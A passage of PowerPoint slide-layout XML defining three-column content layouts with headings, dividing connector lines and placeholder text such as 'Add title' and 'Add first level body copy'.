            <a:ext cx="0" cy="4500562"/>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60936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ubtitle &amp; 3 content with titles &amp; dividing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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{815D3A4F-C11A-480D-B249-1B3A0A517FC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358774" y="1213249"/>
            <a:ext cx="11337924" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add subtitle</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDFAFE8B-1D42-460B-875F-B063FE652E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358777" y="2044301"/>
            <a:ext cx="3519888" cy="4085035"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="16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9" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51856C50-B020-4008-B65A-11A3AB5CAC31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267793" y="2044301"/>
            <a:ext cx="3519888" cy="4085035"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="16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10" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFA9709D-8056-4926-A2FF-317C8EA457A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8176811" y="2044301"/>
            <a:ext cx="3519888" cy="4085035"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="16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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9828F758-21A2-4FD1-860C-ECD2B79A8453}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4073229" y="1628775"/>
            <a:ext cx="0" cy="4500562"/>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1EDE509-68AA-40B1-9F83-E6D6304470E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7982246" y="1628775"/>
            <a:ext cx="0" cy="4500562"/>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13" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F999E87B-8E6F-4BBA-94A0-ACEF604C30C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358776" y="1628775"/>
            <a:ext cx="3519887" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3B6B689-B2B2-4A64-8AAA-E2BB252A0B6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267793" y="1628775"/>
            <a:ext cx="3519887" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55C9CD3A-13C5-448A-B371-53B3D9B2280B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8176811" y="1628775"/>
            <a:ext cx="3519887" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187310476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3 content with titles &amp; dividing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D266-24FD-49CB-9AFC-2A4C82776910}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358774" y="445811"/>
            <a:ext cx="11337925" cy="710639"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDFAFE8B-1D42-460B-875F-B063FE652E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358777" y="1912097"/>
            <a:ext cx="3519888" cy="4217240"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="16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9" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51856C50-B020-4008-B65A-11A3AB5CAC31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267793" y="1912097"/>
            <a:ext cx="3519888" cy="4217240"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="16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sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFA9709D-8056-4926-A2FF-317C8EA457A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8176811" y="1912097"/>
            <a:ext cx="3519888" cy="4217240"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="1600" dirty="0"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add first level body copy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fifth level</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9828F758-21A2-4FD1-860C-ECD2B79A8453}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4073229" y="1463520"/>
            <a:ext cx="0" cy="4665817"/>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1EDE509-68AA-40B1-9F83-E6D6304470E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7982246" y="1463520"/>
            <a:ext cx="0" cy="4665817"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="127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13" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F999E87B-8E6F-4BBA-94A0-ACEF604C30C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358776" y="1463520"/>
            <a:ext cx="3519887" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3B6B689-B2B2-4A64-8AAA-E2BB252A0B6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267793" y="1463520"/>
            <a:ext cx="3519887" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55C9CD3A-13C5-448A-B371-53B3D9B2280B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8176811" y="1463520"/>
            <a:ext cx="3519887" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="397740440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theme" Target="../theme/theme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3570FDA4-5188-4CAC-BA53-A172F440343F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358775" y="365126"/>
            <a:ext cx="11337925" cy="710639"/>
